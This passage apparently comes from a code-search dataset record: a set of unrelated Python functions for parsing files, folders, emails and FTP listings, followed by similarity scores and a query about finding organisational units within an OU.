\"(\\s+\\d+)(\\s+\\w{3}\\s+\\d+\\s+[\\d:]+)\" +\n \"\\s+(\\S+)\")\n cls.map = {'DIRECTORY': 'd',\n 'd': 'd',\n 'FILE': 'f',\n '-': 'f'}\n\n if any([value.startswith(\"FILE\"),\n value.startswith(\"DIRECTORY\")]):\n x = value.split('\\t')\n ptype = cls.map[util.pop0(x)]\n pname = util.pop0(x).strip()\n util.pop0(x)\n util.pop0(x)\n util.pop0(x)\n cart = util.pop0(x)\n if cart is not None:\n cart = cart.strip()\n cos = util.pop0(x)\n if cos is not None:\n cos = cos.strip()\n else:\n cos = ''\n return Checkable(path=pname, type=ptype, cos=cos, cart=cart)\n else:\n ltup = re.findall(cls.rgxl, value)\n if ltup:\n (type, ign1, ign2, ign3, ign4, fname) = ltup[0]\n return Checkable(path=fname, type=cls.map[type])\n return None", "def parse_rism_folder(self):\n self._set_job_name()\n self._find_named_files()\n self._load_files()\n self._parse_input()\n self._check_results()\n self._parse_results()\n self._load_molecule()\n self._calculate_runtime()", "def parseFilePath(self, filepath):\n\n li = filepath.split(\"/\") \n last = li[-1].split(\"_\")\n\n self.subjectName = li[-2]\n self.experimenterName = li[-3]\n self.experimentDate = last[-1]\n self.paradigm = last[-2]\n self.subjectName = last[-3]", "def extract (msgfile, key):\n m = email.message_from_file(msgfile)\n From, To, Subject, Date = caption(m)\n #Text, Html, Files, Parts = pullout(m, key)\n Text = Text.strip(); Html = Html.strip()\n msg = {\"subject\": Subject, \"from\": From, \"to\": To, \"date\": Date,\n \"text\": Text, \"html\": Html, \"parts\": Parts}\n if Files: msg[\"files\"] = Files\n return msg", "def parseOutText(f):\n\n\n f.seek(0) ### go back to beginning of file (annoying)\n all_text = f.read()\n ### split off metadata\n \n content = re.split(\"X-FileName:.*$\", all_text, flags=re.MULTILINE, maxsplit=1)\n words = \"\"\n if len(content) > 1:\n text_string = content[1]\n\n ## remove mails that are forwarded or to which are responded\n # e.g. ---------------------- Forwarded\"\n text_string = re.split(\"-*\\sForwarded\", text_string, maxsplit=1)[0]\n\n # -----Original Message-----\n text_string = re.split(\"-*\\Original\\sMessage\", text_string, maxsplit=1)[0]\n\n # Vince J Kaminski@ECT\n # 04/30/2001 02:28 PM\n # To:\tStanley Horton/Corp/Enron@Enron, Danny McCarty/ET&S/Enron@Enron\n # cc:\tVince J Kaminski/HOU/ECT@ECT \n # or\n # Vince J Kaminski@ECT\n # 04/30/2001 02:28 PM\n # to:\tStanley Horton/Corp/Enron@Enron, Danny McCarty/ET&S/Enron@Enron\n # cc:\tVince J Kaminski/HOU/ECT@ECT \n \n text_string = re.split(\"((.*\\n){2})[Tt]o:\\s\", text_string, maxsplit=1)[0]\n\n ### remove punctuation\n # should be autopmatically by scikit learn\n #text_string = text_string.translate(string.maketrans(\"\", \"\"), string.punctuation)\n\n ### project part 2: comment out the line below\n #words = text_string\n\n ### split the text string into individual words, stem each word,\n ### and append the stemmed word to words (make sure there's a single\n ### space between each stemmed word)\n from nltk.stem.snowball import SnowballStemmer\n\n stemmer = SnowballStemmer(\"english\")\n words = [stemmer.stem(word) for word in text_string.split()]\n\n\n\n return \" \".join(words)", "def _GetSubFileEntries(self):\n if self._directory is None:\n self._directory = self._GetDirectory()\n\n if self._directory:\n for path_spec in self._directory.entries:\n yield APMFileEntry(self._resolver_context, self._file_system, path_spec)", "def handle_file_retrieval(self, msg):\n Logger.info(\"Slave: Retrieving files\")\n params = msg.get_field(MessageKeys.params_key)\n host = msg.get_field(MessageKeys.sender_key)\n port = params[MessageKeys.ftp_port_key]\n subpath = params[MessageKeys.ftp_subpath_key]\n self.presentation.set_files(params[MessageKeys.presentation_content_key])\n self.presentation.reset()\n self.layout.init_presentation()\n self.retrieve_files_over_ftp(host, port, subpath)\n self.presentation_ended = False\n return self.create_response(msg.get_command())", "def Parse_folder_to_multi_faa(target_dir,faa_filename):\n os.chdir(target_dir)\n output_handle = open(faa_filename, \"w\")\n for gbk_filename in FileGen(target_dir):\n with open(gbk_filename, \"r\") as input_handle:\n for seq_record in SeqIO.parse(input_handle, \"genbank\") :\n print(\"Dealing with GenBank record %s\" % seq_record.id)\n for seq_feature in seq_record.features :\n if seq_feature.type==\"CDS\" :\n assert len(seq_feature.qualifiers['translation'])==1\n try:\n name = seq_feature.qualifiers['locus_tag'][0]\n except KeyError:\n name = seq_feature.qualifiers['product'][0]\n output_handle.write(\">%s from %s\\n%s\\n\" % (\n name,\n gbk_filename.split(\"/\")[-1],\n seq_feature.qualifiers['translation'][0])) \n output_handle.close()", "def download_attachment(self, msg):\n path = None\n for part in msg.walk():\n if part.get_content_type() == 'application/pdf':\n\n time_prefix = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n filename = time_prefix+\"-\"+part.get_filename()\n path = os.path.join(self._DOWNLOAD_FOLDER, filename)\n\n if not os.path.isfile(path):\n with open(path, 'wb') as fb:\n fb.write(part.get_payload(decode=True))\n\n self._processed = True\n return path, self.get_company(msg['From'], msg['To'])", "def getFiles(folderToProcess,filter):\n\n print(f\"Parsing {folderToProcess} for {filter} files\")\n\n if debug:\n for path in Path(folderToProcess).rglob(filter):\n print(f\"Found {path}\")\n\n all_files = [str(x) for x in Path(folderToProcess).rglob(filter)] \n\n return all_files", "def create_counterparty_dict(file_name) -> Dict[str, str]:\n dct = {}\n with open(file_name) as f:\n root_dir = f.readline().strip('\\n')\n for line in f:\n key, val = line.strip('\\n').split('!!!!')\n temp = val.split('==')\n d = {'path': root_dir + temp[0], 'to': temp[1:]}\n dct[key] = d\n return dct", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n\n lists,nextPageToken = ListMessages(service,user_id = 'me',q='subject:tradingview')\n # print (lists)\n mes,mes_str = GetMimeMessage(service,user_id = 'me',msg_id = lists[0]['id'])\n print (mes)\n\n\n j = 0\n for part in mes.walk(): \n j = j + 1 \n fileName = part.get_filename() \n contentType = part.get_content_type() \n mycode=part.get_content_charset(); \n # 保存附件 \n if fileName:\n print ('hhhhhhhhhhhhh')\n elif contentType == 'text/plain' or contentType == 'text/html': \n #保存正文 \n data = part.get_payload(decode=True) \n content=str(data); \n # if mycode=='gb2312': \n # content= mbs_to_utf8(content) \n #end if \n # nPos = content.find('降息') \n # print(\"nPos is %d\"%(nPos)) \n # print >> f, data \n # 正则替换掉所有非 <a></a>的标签 <[^>|a]+>\n # reg = re.compile('<[^>|a]+>')\n contentTxt = re.compile('<[^>|a]+>').sub('',content)\n print (reg.sub('',content))\n #end if \n\n\n \n # help(mes)\n # for i in mes.values():\n # print (i)\n # # print (mes[i]);\n # print (\"----------\")\n # print (mes['from'])\n # print (type (mes))\n # # print \n # parsed = Parser().parsestr(mes)\n # print (parsed)\n # print (mes)\n # for i in mes:\n # print (i)\n # for item in lists:\n # mes = GetMimeMessage(service,user_id = 'me',msg_id = item['id'])\n # # print (mes)\n # parsed = Parser().parsestr(mes)\n # print (parsed)", "def get_data_file():\n this_directory = os.path.dirname(__file__)\n parent_directory = os.path.dirname(this_directory)\n return os.path.join(parent_directory, '_data/fortunes.txt')", "def _parse_transcription_file(self, root: str, name: str) -> None:\n trans_path = os.path.join(root, name)\n with open(trans_path, \"r\", encoding=\"utf-8\") as trans:\n # Each line has the form \"ID THE TARGET TRANSCRIPTION\"\n for line in trans:\n id_, transcript = line.split(maxsplit=1)\n dropped = self._process_audio(root, id_)\n if not dropped:\n self._process_transcript(transcript)", "def get_make_contact(root):\n root_split = root.split('/')\n\n contact_name = root_split[-1]\n #groupchat's folder's end with .chat\n group_chat = False\n if contact_name.endswith(\".chat\"):\n contact_name = contact_name[:-5]\n group_chat = True\n\n account_name = root_split[-2]\n protocol_name = root_split[-3]\n\n protocol_contained = None\n for protocol in protocols:\n if protocol.name == protocol_name:\n protocol_contained = protocol\n break\n if not protocol_contained:\n protocol_contained = Protocol(protocol_name)\n protocols.append(protocol_contained)\n\n account_contained = protocol_contained.contains_account(account_name)\n if not account_contained:\n account_contained = Account(account_name)\n protocol_contained.add_account(account_contained)\n\n contact_contained = account_contained.contains_contact(contact_name)\n if not contact_contained:\n contact_contained = Contact(contact_name, group_chat)\n account_contained.add_contact(contact_contained)\n\n return contact_contained, account_contained", "def process_files(file_location, day):\n # construct file path\n file_dir = PREFIX+file_location\n file_pattern = file_dir+'lz_'+day+'*_raw.root'\n # print(file_pattern)\n file_list = glob.glob(file_pattern)\n print(\"There are %s MC files in the requested directory (%s).\" %(len(file_list), file_dir))\n file_names = []\n for f in file_list:\n file_name_only = f.split('/')\n file_names.append(file_name_only[-1])\n return file_names", "def getFileList(outputpoolfcstring):\n\n pfc_name = outputpoolfcstring.split(':', 1)[1] \n xmldoc = minidom.parse(pfc_name) \n\n return xmldoc.getElementsByTagName(\"File\")", "def _parse_ach_file(self, contents):\n file_length = len(contents)\n\n for index in range(0, file_length, self.LINE_LENGTH):\n line = contents[index:index + self.LINE_LENGTH]\n\n if line.startswith('1'):\n self._read_header(line)\n elif line.startswith('5'):\n self._read_batch_header(line)\n elif line.startswith('6'):\n self._read_entry_detail(line)\n elif line.startswith('7'):\n self._read_addenda_record(line)\n elif line.startswith('8'):\n self._read_batch_control_record(line)\n elif line.startswith('9'):\n if line == '9' * 94:\n continue\n self._read_file_control_record(line)", "def getFilesToBeCopied(self):\n\n local_data_dirs = self.LocalDataDirPaths\n filesToBeCopiedDict = {} ### A dict with LFN as the key and local-PFN as the value for files to be copied\n ### Loop over all directories\n for local_data_dir in local_data_dirs:\n ### Make sure the agent does not copy more than specified files in one cycle. This is good for stopping agent cleanly if need be\n if len(filesToBeCopiedDict) >= self.MaxFilesToTransferPerCycle: break\n ### Do OS walk over local_data_dir (ROACH (.egg) or RSA (.MAT))\n for currentdir, subdirs, filenames in os.walk(local_data_dir):\n ### Make sure the agent does not copy more than specified files in one cycle. This is good for stopping agent cleanly if need be\n if len(filesToBeCopiedDict) >= self.MaxFilesToTransferPerCycle: break\n gLogger.debug('In dir: %s . It has these many files (%s)' % (currentdir, len(filenames)))\n ### Sort file names\n filenames.sort()\n for filename in filenames:\n gLogger.debug('Found filename: %s' % filename)\n ### Make sure file ends in acceptable suffix.\n if not filename.endswith(tuple(self.acceptableFileSuffix)):\n ### Go to next file\n continue\n \n pfn = os.path.join(currentdir, filename)\n sub_lfn = pfn.split(local_data_dir)[-1].strip(\"/\")\n lfn = os.path.join( self.SEDataDirPath, pfn.split(local_data_dir)[-1].strip(\"/\") )\n gLogger.debug('pfn/sub_lfn/lfn: %s -- %s -- %s' % (pfn,sub_lfn,lfn))\n filesToBeCopiedDict[lfn] = pfn\n ### Make sure the agent does not copy more than specified files in one cycle. This is good for stopping agent cleanly if need be\n if len(filesToBeCopiedDict) >= self.MaxFilesToTransferPerCycle: break\n\n\n ### Now We have a queue of files that need to be transferred (if not already transferred)\n gLogger.info('Potentially these many files will be copied in this cycle - %s' % len(filesToBeCopiedDict))\n if len(filesToBeCopiedDict) == 0:\n return S_OK( {} )\n \n ### Lets first check if the files are already in the DFC\n res_FC = self.fc.getReplicas(filesToBeCopiedDict.keys())\n if not res_FC['OK']:\n msg = 'Could not query FC with getReplicas(). Message is : %s' %res_FC['Message']\n gLogger.error(msg)\n return S_ERROR(msg)\n res_FC_Value = res_FC['Value']\n if 'Successful' in res_FC_Value and res_FC_Value['Successful']:\n ### This means that the files are already in the catalog (FC)\n lfns_in_FC = res_FC_Value['Successful'].keys()\n gLogger.warn('Found some files already in the catalog. Will verify and delete them locally. Here is the file dict : %s' %res_FC_Value['Successful'])\n ### verify and delete local copy of files that are already in FC\n localFilesAlreadyCopiedDict = { lfn:filesToBeCopiedDict[lfn] for lfn in res_FC_Value['Successful'] }\n self.verifyAndDeleteAlreadyRegisterdFiles(res_FC_Value['Successful'], localFilesAlreadyCopiedDict)\n\n lfns_tobeCopied = []\n if 'Failed' in res_FC_Value and res_FC_Value['Failed']:\n ### This means that the files are NOT in the catalog (FC) and can be copied\n lfns_tobeCopied = res_FC_Value['Failed'].keys()\n \n ### Copy only those files that are not in FC\n filesToBeCopiedDict = { lfn:filesToBeCopiedDict[lfn] for lfn in lfns_tobeCopied }\n \n return S_OK( filesToBeCopiedDict )", "def getAnnotationData(annotatedFolderPathList):\n enList, frList, refList, annotList = [], [], [], []\n # be sure the format is right\n if type(annotatedFolderPathList) is str:\n annotatedFolderPathList = [annotatedFolderPathList]\n # get the lists of annotations and sentences\n for path in annotatedFolderPathList:\n sentEnPath = u'{0}sample.en'.format(path)\n sentFrPath = u'{0}sample.fr'.format(path)\n sentAnnotPath = u'{0}sampleAnnotation.tsv'.format(path)\n sentRefPath = u'{0}sampleReference.tsv'.format(path)\n enList, frList, refList, annotList = extractLineData(sentEnPath, sentFrPath, sentRefPath, sentAnnotPath,\n enList, frList, refList, annotList)\n return enList, frList, refList, annotList", "def process_data(self):\n\t\t\n\t\tboundary = self.headers.plisttext.split('=')[1]\n\t\tremain = int(self.headers['content-length'])\n\t\t\n\t\t#Check whether file is started with boundary\n\t\tline = self.rfile.readline()\n\t\tremain -= len(line)\n\t\tif boundary not in line:\n\t\t\treturn False,\"File does not begin with boundary.\"\n\t\t\n\t\t#Get disposition info\t\t\n\t\tline = self.rfile.readline()\n\t\tremain -= len(line)\n\t\t\n\t\t#Check file info \n\t\tfilename = re.findall(r'Content-Disposition.*name=\"file\"; filename=\"(.*)\"',line)\n\t\tif not filename:\n\t\t\treturn False,\"Missing file name.\"\n\t\tpath = self.translate_path(self.path)\n\t\tprint path\n\t\tfilename = os.path.join(path,filename[0])\n\t\t\n\t\t#Check whether file name exists\n\t\twhile os.path.exists(filename):\n\t\t\tfilename = filename.split('.')[0]+'+'+filename.split('.')[1]\n\t\t\t\n\t\t\n\t\t#Get content type info\n\t\tline = self.rfile.readline()\n\t\tremain -= len(line)\n\t\tfiletype = re.findall(r'Content-Type: (.*).*',line)\n\t\tline = self.rfile.readline() #it is an empty line\n\t\tremain -= len(line)\n\t\t\n\t\t#Content begins, try writing data to file in server\n\t\ttry:\n\t\t\toutput = open(filename,'wb')\n\t\texcept IOError:\n\t\t\treturn False,\"Authority denied.\"\n\t\t\n\t\t#Write data\n\t\tfirstline = self.rfile.readline()\n\t\tremain -= len(firstline)\n\t\twhile remain > 0:\n\t\t\tline = self.rfile.readline()\n\t\t\tremain -= len(line)\n\t\t\tif boundary in line:\n\t\t\t\tfirstline = firstline[0:-1]\n\t\t\t\tif firstline[-1] == '\\r':\n\t\t\t\t\tfirstline = firstline[0:-1]\n\t\t\t\toutput.write(firstline)\n\t\t\t\toutput.close()\n\t\t\t\treturn True,\"File created.Path: %s\" % filename\n\t\t\telse:\n\t\t\t\toutput.write(firstline)\n\t\t\t\tfirstline = line\n\t\treturn False,\"Unexpected file end.\"", "def parse_message(message, selector):\n\n msg = message.decode('utf-8')\n print(colored(\"Telnet pide \" + msg, 'magenta'))\n\n # Mandó list?\n clist = re.match(r'list', msg)\n if clist:\n return armar_lista()\n\n # Mandó offer?\n else:\n offer = re.match(r'offer (.*)\\r', msg)\n if offer:\n filename = offer[1] \n\n file_path = os.getcwd() + \"/files/\" + filename\n\n if os.path.exists(file_path):\n sizefile = int(os.path.getsize(file_path))\n\n # Calcula el md5\n with open(file_path, \"rb\") as f:\n file_hash = hashlib.md5()\n chunk = f.read(8192)\n while chunk:\n file_hash.update(chunk)\n chunk = f.read(8192)\n\n file_hash = file_hash.hexdigest()\n\n aux_file = AppFile(filename, sizefile, file_hash)\n\n # Guardamos el archivo en nuestro diccionario de seguimiento local\n local_files[file_hash] = aux_file\n\n # Lo borramos del de los disponibles remotos\n if remote_files.get(file_hash):\n del remote_files[file_hash]\n\n # Una vez actualizada la lista de archivos locales, mandamos a actualizar los anuncios\n announce_forever.set_announcements()\n\n return 'ARCHIVO AGREGADO'\n\n else:\n return 'ARCHIVO NO ENCONTRADO'\n\n\n # Mandó get?\n else:\n get = re.match(r'get (\\d*)\\r\\n', msg)\n if get:\n file_id = int(get[1])\n msg = f'INICIANDO DESCARGA DEL ARCHIVO {file_id}'\n print(msg)\n request_download(file_id, selector)\n return msg\n\n return 'COMANDO INCORRECTO!'", "def search(folderName):\n\n result, data = mailBox.select(folderName, True)\n\n if TESTING:\n searchResult, uid = mailBox.uid('SEARCH', None, 'UNSEEN')\n else:\n searchResult, uid = mailBox.uid('SEARCH', None, 'ALL')\n\n number_messages = len(uid[0].split(' ')) if uid[0] != \"\" else 0\n if number_messages == 0:\n print \"\\nERROR: No messages found in %s\\n\" % folderName\n print \"\\n* Exiting... *\\n\"\n sys.exit(0)\n print \"\\nNumber of messages in %s: %d\" % (folderName, number_messages)\n\n uidList = \"\"\n for i in uid[0].split(' '):\n if i.isdigit():\n uidList += i + \",\"\n uidList = uidList[:-1]\n\n return uidList", "def clean_data(self, path, exclude_msgtypes=None):", "def prepare_training_data(self, data_folder_path):\n\n #get the directories (one directory for each subject) in data folder\n dirs = os.listdir(data_folder_path)\n\n #list to hold all subject faces\n faces = []\n #list to hold labels for all subjects\n labels = []\n #List to hold subject names\n subjects = []\n\n label = -1;\n #let's go through each directory and read images within it\n for dir_name in dirs:\n\n #ignore system files like .DS_Store\n if dir_name.startswith(\".\"):\n continue;\n\n label += 1\n subjects.append(dir_name)\n logger.info(\"label=%d subject=%s\" %(label, dir_name))\n\n #build path of directory containing images for current subject subject\n #sample subject_dir_path = \"training-data/Bruce\"\n subject_dir_path = data_folder_path + \"/\" + dir_name\n\n #get the images names that are inside the given subject directory\n subject_images_names = os.listdir(subject_dir_path)\n\n #go through each image name, read image,\n #detect face and add face to list of faces\n for image_name in subject_images_names:\n\n #ignore system files like .DS_Store\n if image_name.startswith(\".\"):\n continue;\n\n #sample image path = training-data/Bruce/face1.png\n image_path = subject_dir_path + \"/\" + image_name\n image = cv2.imread(image_path)\n logger.info(\"file size: %d. numpy image size: %d\" %(os.path.getsize(image_path), len(image)))\n face, rect = self.detect_face(image)\n\n #we will ignore faces that are not detected\n if face is not None:\n #add face to list of faces\n faces.append(face)\n #add label for this face\n labels.append(label)\n\n return faces, labels, subjects", "def _parse_contact_information(self):\n left_column = self.content.find(\"div\", class_=\"linkeSpalte40\")\n graubox = left_column.find(\n lambda tag: tag.name == \"div\" and tag[\"class\"] == [\"grauBox\"]\n )\n\n emails_raw = graubox.find_all(\"a\", class_=\"mail\")\n websites_raw = graubox.find_all(\"a\", class_=\"noDecoration\")\n telephone_raw = graubox.find_all(\"span\", class_=\"telefonnummer\")\n address_raw = [\n e.nextSibling for e in graubox.find_all(\"em\") if e.text == \"Anschrift:\"\n ]\n\n address = address_raw[0].li.get_text(\"\\n\") if address_raw else None\n emails = [re.sub(r\"^mailto:\", \"\", e.attrs[\"href\"]) for e in emails_raw]\n phone_numbers = [t.text for t in telephone_raw]\n websites = [w.attrs[\"href\"] for w in websites_raw]\n\n return {\n \"address\": address,\n \"emails\": emails,\n \"phone_numbers\": phone_numbers,\n \"websites\": websites,\n }", "def parse_BC5CDR(kb_data):\n\n print(\"Parsing BC5CDR corpus...\")\n output_BC5CDR = dict()\n\n if kb_data.kb == \"medic\":\n entity_type = \"Disease\"\n \n elif kb_data.kb == \"ctd_chemicals\":\n entity_type = \"Chemical\"\n\n corpus_dir = \"./retrieved_data/corpora/BioCreative-V-CDR-Corpus/CDR_Data/CDR.Corpus.v010516/\" \n filenames = [\"CDR_TrainingSet.PubTator.txt\", \"CDR_DevelopmentSet.PubTator.txt\", \"CDR_TestSet.PubTator.txt\"]\n\n for filename in filenames:\n with open(corpus_dir + filename, 'r', encoding=\"utf-8\") as corpus_file:\n data = corpus_file.readlines()\n corpus_file.close()\n\n for line in data:\n line_data = line.split(\"\\t\")\n file_id = line_data[0]\n \n if len(line_data) == 6 and line_data[4] == entity_type:\n mesh_id = \"MESH:\" + line_data[5].strip(\"\\n\") \n \n if mesh_id in kb_data.child_to_parent.keys():\n direct_ancestor = \"https://id.nlm.nih.gov/mesh/\" \\\n + kb_data.child_to_parent[mesh_id].strip(\"MESH:\")\n update_mesh_id = \"https://id.nlm.nih.gov/mesh/\" + line_data[5].strip(\"MESH:\").strip(\"\\n\")\n annotation = (line_data[3], line_data[1], line_data[2], update_mesh_id, direct_ancestor)\n output_BC5CDR = add_annotation_to_output_dict(file_id, annotation, output_BC5CDR)\n\n print(\"...Done!\")\n return output_BC5CDR", "def process_line(log_line):\n splt = log_line.split(maxsplit=5)\n folder_list = splt[-1].split(\"/\")\n return [f.strip() for f in folder_list]", "def get_data_file_paths(input_folder: str, data_file_prefix: str = \"\",\n data_file_postfix: str = \".nc\") -> list:\n data_file_paths = list()\n # we look at all subfolders, whatever they are named\n subfolders = get_files(input_folder, keep_path=True, order_numerical=True)\n for subfolder in subfolders:\n data_files = get_files(subfolder, prefix=data_file_prefix,\n postfix=data_file_postfix, keep_path=True,\n order_numerical=True)\n data_file_paths += data_files\n return data_file_paths", "def get_folder_contact(contact_id: Optional[str] = None,\n folder_id: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetFolderContactResult:\n __args__ = dict()\n __args__['contactId'] = contact_id\n __args__['folderId'] = folder_id\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('google-native:essentialcontacts/v1:getFolderContact', __args__, opts=opts, typ=GetFolderContactResult).value\n\n return AwaitableGetFolderContactResult(\n email=pulumi.get(__ret__, 'email'),\n language_tag=pulumi.get(__ret__, 'language_tag'),\n name=pulumi.get(__ret__, 'name'),\n notification_category_subscriptions=pulumi.get(__ret__, 'notification_category_subscriptions'),\n validate_time=pulumi.get(__ret__, 'validate_time'),\n validation_state=pulumi.get(__ret__, 'validation_state'))", "def parse_os2_font_directory(data):\n logging.debug('Parsing font directory')\n try:\n # If a font directory exists we use that to find the face's\n # resource ID, as in this case it is not guaranteed to have\n # a type of OS2RES_FONTFACE (7).\n fontdir = OS2FONTDIRECTORY.from_bytes(data)\n data = data[OS2FONTDIRECTORY.size:]\n if len(data) >= fontdir.usnFonts * OS2FONTDIRENTRY.size:\n direntry_type = OS2FONTDIRENTRY\n else:\n direntry_type = OS2FONTDIRENTRY_SMALL\n entries = direntry_type.array(fontdir.usnFonts).from_bytes(data)\n return entries\n except ValueError as e:\n logging.debug('Failed to parse font directory: %s', e)\n return ()", "def read_total_com_file(self, datadir='.'):\n\n filename = 'total_com.txt'\n fullname = Path(datadir) / filename\n\n return self.read_file(fullname)", "def create_json_from_email(self):\n logging.basicConfig(level=logging.DEBUG)\n logging.debug('Started email to json parsing')\n\n yaml_file_path = self.get_yaml_file()\n yaml_loader = YAMLLoader(yaml_file_path)\n instruction = yaml_loader.parse_yaml()\n if instruction is None:\n return 'Error : Instructions are empty'\n\n email_parser = EmailParser(instruction)\n files_created = 0\n for eml in glob.glob(f\"{instruction.msg_file_path}/*.eml\"):\n email_data = email_parser.get_email_meta(eml)\n if email_data:\n is_created = JsonUtils.create_json_file(email_data, instruction.msg_file_path)\n if is_created:\n files_created += 1\n\n return f'{files_created} json files created'", "def parse_webhook_data(self, data):\n\n message = data['message']\n\n self.chat_id = message['chat']['id']\n self.incoming_message_text = message['text'].lower()\n self.first_name = message['from']['first_name']\n if 'last_name' in message['from']:\n self.last_name = message['from']['last_name']", "def parse_and_validate_data_dir(data_dir):\n paths = [data_dir] + [os.path.join(data_dir, name) for name in FILE_NAMES]\n exists = [(path, os.path.exists(path)) for path in paths]\n try:\n for path, exist in exists:\n if not exist:\n raise ValidationError(path)\n except ValidationError as err:\n print USAGE_STR.format(sys.argv[0])\n print DATA_DIR_ERR.format(err.args[0])\n sys.exit()\n return data_dir", "def parseInputFileList (self):\n filelist = []\n try:\n with open (self.cfgName) as fIn:\n for line in fIn:\n line = (line.split(\"@@@\")[0]).strip()\n if line:\n self.lines.append(line)\n except IOError:\n print \"*** WARNING: label cfg file \" , self.cfgName , \" not found\"\n return", "def get_from_email(column_names, start_dates, end_dates, mail_server,\n account, sender, password):\n time_flag = None\n dfs = {test: pd.DataFrame(columns=column_names[test]) \\\n for test in [\"covid_ag\", \"flu_ag\"]}\n start_date = compare_dates(start_dates[\"covid_ag\"],\n start_dates[\"flu_ag\"], \"s\")\n end_date = compare_dates(end_dates[\"covid_ag\"],\n end_dates[\"flu_ag\"], \"l\")\n\n with MailBox(mail_server).login(account, password, 'INBOX') as mailbox:\n for search_date in [start_date + timedelta(days=x)\n for x in range((end_date - start_date).days + 1)]:\n for message in mailbox.fetch(A(AND(date=search_date.date(), from_=sender))):\n for att in message.attachments:\n name = att.filename\n\n # Check the test type\n if \"Sars\" in name:\n test = \"covid_ag\"\n elif \"Flu\" in name:\n test = \"flu_ag\"\n else:\n continue\n\n # Check whether we pull the data from a valid time range\n whether_in_range = check_whether_date_in_range(\n search_date, start_dates[test], end_dates[test])\n if not whether_in_range:\n continue\n\n print(f\"Pulling {test} data received on %s\"%search_date.date())\n toread = io.BytesIO()\n toread.write(att.payload)\n toread.seek(0) # reset the pointer\n newdf = pd.read_excel(toread) # now read to dataframe\n newdf = regulate_column_names(newdf, test)\n dfs[test] = dfs[test].append(newdf)\n time_flag = search_date\n return dfs, time_flag", "def test_Retrievefilesdict (self):\n\n\t\tknown_values = (\n\t\t\t\t(\n\t\t\t\t\t('TESTS/Test3/Telegram Desktop/File not in use.CBR','.file'),\n\t\t\t\t\t{0: {'name': 'File not in use.CBR', 'size': 0}},\n\t\t\t\t\t),\n\t\t\t\t(\t\n\t\t\t\t\t('TESTS/Test3/Emptyfoldertest/This is a folder', '.folder'),\n\t\t\t\t\t{0: {'name': 'This is a folder/Videofile.avi', 'size': 0},\n\t\t\t\t\t 1: {'name': 'This is a folder/Text Document.txt', 'size': 64},\n\t\t\t\t\t 2: {'name': 'This is a folder/Subfolder to analyze/Document in a sub-folder.txt', 'size': 410}},\n\t\t\t\t\t)\n\t\t\t\t\t)\n\t\tfor testvalue, goal in known_values:\n\t\t\tFullfilepath, Filetype = testvalue\n\t\t\titemdict = MD.Retrievefilesdict (Fullfilepath, Filetype)\n\t\t\tself.assertEqual (len (goal), len (itemdict))\n\t\t\tfor key in goal:\n\t\t\t\tself.assertEqual (itemdict[key],goal[key])", "def read_files_to_dict(dir_path):\n conversations = {}\n for filename in os.listdir(dir_path):\n if filename.endswith(\".txt\") and '-' not in filename:\n file_path = os.path.abspath(os.path.join(dir_path, filename))\n with open(file_path, 'r') as f:\n x = f.readlines()\n content_unicode = unicode(x[0], encoding='utf-8', errors='replace')\n if not filename in conversations:\n conversations[filename.split('.txt')[0]] = content_unicode\n return conversations", "def getftpfilename(ftpadress, remotedir, pattern):\n # ftp = FTP('ftp.cdc.noaa.gov')\n ftp = FTP(ftpadress)\n # print(ftp.getwelcome())\n # get direction info\n try:\n ftp.login()\n # ftp.cwd('/Datasets/ncep.reanalysis/pressure')\n ftp.cwd(remotedir)\n files = []\n ftp.dir(files.append) \n # # print(files)\n except ftplib.all_errors as e:\n print('FTP error:', e)\n # decode filename or dirname\n re_files = []\n for file in files:\n # print(file)\n if file.find(pattern) > 0:\n ss = file.split(' ')\n re_files.append(ss[-1]) \n return re_files", "def work(data):\n filepath = data['filepath']\n user = data['user']\n checksum_data = list(filter(lambda x: x['type'] == 'sha256', data['decrypted_checksums']))\n decrypted_checksum = checksum_data[0]['value']\n stable_id = data['accession_id']\n LOG.info(\"Mapping file with path %s and checksum %s to stable_id %s\", filepath, decrypted_checksum, stable_id)\n\n # Remove file from the inbox\n # TODO\n\n db.set_stable_id(filepath, user, decrypted_checksum, stable_id) # That will flag the entry as 'Ready'\n\n LOG.info(\"Stable ID %s mapped to %s\", stable_id, filepath)\n\n # Send message to mark file as completed on the CEGA side\n completed_data = data\n completed_data.pop(\"type\", None)\n LOG.info(f\"Reply message to files.completed: {completed_data}\")\n\n return (completed_data, False)" ]
[ "0.61010617", "0.5539876", "0.5464439", "0.5427242", "0.53528404", "0.5294358", "0.5280345", "0.52603656", "0.5202298", "0.52001935", "0.51878786", "0.5151942", "0.50964266", "0.5094671", "0.49855223", "0.49736506", "0.49720562", "0.4927294", "0.4900818", "0.48834655", "0.48789734", "0.48381448", "0.4825648", "0.48243362", "0.4813187", "0.4801121", "0.47902423", "0.47888604", "0.47769055", "0.47704992", "0.4764274", "0.47538555", "0.47512007", "0.47426608", "0.47209713", "0.4709962", "0.47016236", "0.46943554", "0.4680809", "0.46570373", "0.4647155", "0.46349573", "0.46256974", "0.46127698", "0.46118408", "0.46027315", "0.45995784", "0.45975992", "0.45904863", "0.4590346", "0.45867383", "0.45849395", "0.45693207", "0.45684013", "0.4567959", "0.45636138", "0.45479468", "0.45335206", "0.45306948", "0.45297244", "0.45253044", "0.4522797", "0.45172504", "0.45132196", "0.45056853", "0.4504179", "0.449935", "0.449526", "0.44950274", "0.44917256", "0.4488642", "0.44861913", "0.44831556", "0.44738677", "0.44726914", "0.4461898", "0.44592234", "0.44578677", "0.4457354", "0.44558573", "0.44538373", "0.4444849", "0.44443294", "0.44437236", "0.44372588", "0.44354483", "0.44346836", "0.4426496", "0.44232523", "0.4422638", "0.4412091", "0.44112638", "0.4408874", "0.44076487", "0.44055712", "0.4405485", "0.44048628", "0.44023547", "0.43956348", "0.43934658" ]
0.44602105
76
given an OU, find all the OUs within that OU...
